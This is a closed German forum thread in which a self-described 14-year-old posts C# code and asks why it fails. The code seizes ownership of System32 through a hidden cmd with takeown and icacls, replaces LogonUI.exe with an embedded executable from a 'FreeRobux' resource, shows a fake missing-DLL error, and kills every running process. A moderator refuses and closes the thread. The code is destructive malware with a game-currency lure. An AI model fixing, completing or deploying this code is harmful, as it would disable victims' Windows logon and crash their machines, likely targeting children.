Laden...

Systemdateien überschreiben

Erstellt von RedException vor 3 Jahren Letzter Beitrag vor 3 Jahren 246 Views
Thema geschlossen
R
RedException Themenstarter:in
1 Beiträge seit 2021
vor 3 Jahren
Systemdateien überschreiben

Guten Abend, zuerst einmal sei gesagt, dass ich 14 bin und mit diesem Wissen keinerlei kriminelle Aktivitäten verüben möchte. Es dient nur zur Erweiterung meines Wissens.
Nun zur Frage. Ich habe ein Programm in C# geschrieben, welches LogonUI.exe ( im System32 - Ordner) überschreibt. Nach einem bestimmten Delay ( 3000 ms ), wird das System zum Absturz gebracht. Ich bin wie folgt vorgegangen:
Das Programm entpackt eine Exe in den System32 - Ordner, welche sich LogonUI.exe nennt. Daher wird es überschrieben. Das ist ja auch mein Ziel.
Das Problem ist, dass das ganze nicht Funktioniert. Könnte mir evtl. jemand weiterhelfen ?
Liegt es vllt. an dem Absturz, dass die Änderungen nicht gespeichert worden sind, oder gibt es ein Problem mit dem gesamten Code ?
Danke im Voraus.


        public static void Extract(string nameSpace, string outDirectory, string internalFilePath, string resourceName)
        {
            Assembly assembly = Assembly.GetCallingAssembly();

            using (Stream s = assembly.GetManifestResourceStream(nameSpace + "." + (internalFilePath == "" ? "" : internalFilePath + ".") + resourceName))
            using (BinaryReader r = new BinaryReader(s))
            using (FileStream fs = new FileStream(outDirectory + "\\" + resourceName, FileMode.OpenOrCreate))
            using (BinaryWriter w = new BinaryWriter(fs))
                w.Write(r.ReadBytes((int)s.Length));
        }

        bool logon_check = true;

        private void Logon_Load()
        {
            const string quote = "\"";
            ProcessStartInfo logon = new ProcessStartInfo();
            logon.FileName = "cmd.exe";
            logon.WindowStyle = ProcessWindowStyle.Hidden;
            logon.Arguments = @"/k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant " + quote + "%username%:F" + quote;
            Process.Start(logon);
            string LogonUI = @"C:\Windows\System32\LogonUI.exe";
            while (File.Exists(LogonUI) && logon_check)
            {
                try
                {
                    File.Delete(LogonUI);
                }
                catch (Exception ex) { }
                if (!File.Exists(LogonUI))
                {
                    logon_check = false;
                    Extract("FreeRobux", @"C:\Windows\System32", "Resources", "LogonUI.exe");
                    this.Close();
                    
                }
            }
        }


        private void lgn()
        {
            Logon_Load();
            MessageBox.Show("The program can't start because MSVCR71 is missing.", "System Error", MessageBoxButton.OK, MessageBoxImage.Error);

            System.Threading.Thread.Sleep(3000);

            Process[] processes = Process.GetProcesses();
            foreach(Process p in processes)
            {
                try
                {
                    p.Kill();
                }
                catch
                {
                    
                }
            }

        }

16.842 Beiträge seit 2008
vor 3 Jahren

Hi,

egal was Du vor hast: das ist im Endeffekt Manipulation am System mit extremen Missbrauchtspotential. Du willst im Endeffekt Sicherheitsmechanismen von Windows untergraben; und das ist hier im Forum nicht gern gesehen.

Daher schließe ich das Thema.
Danke fürs Verständnis.

Thema geschlossen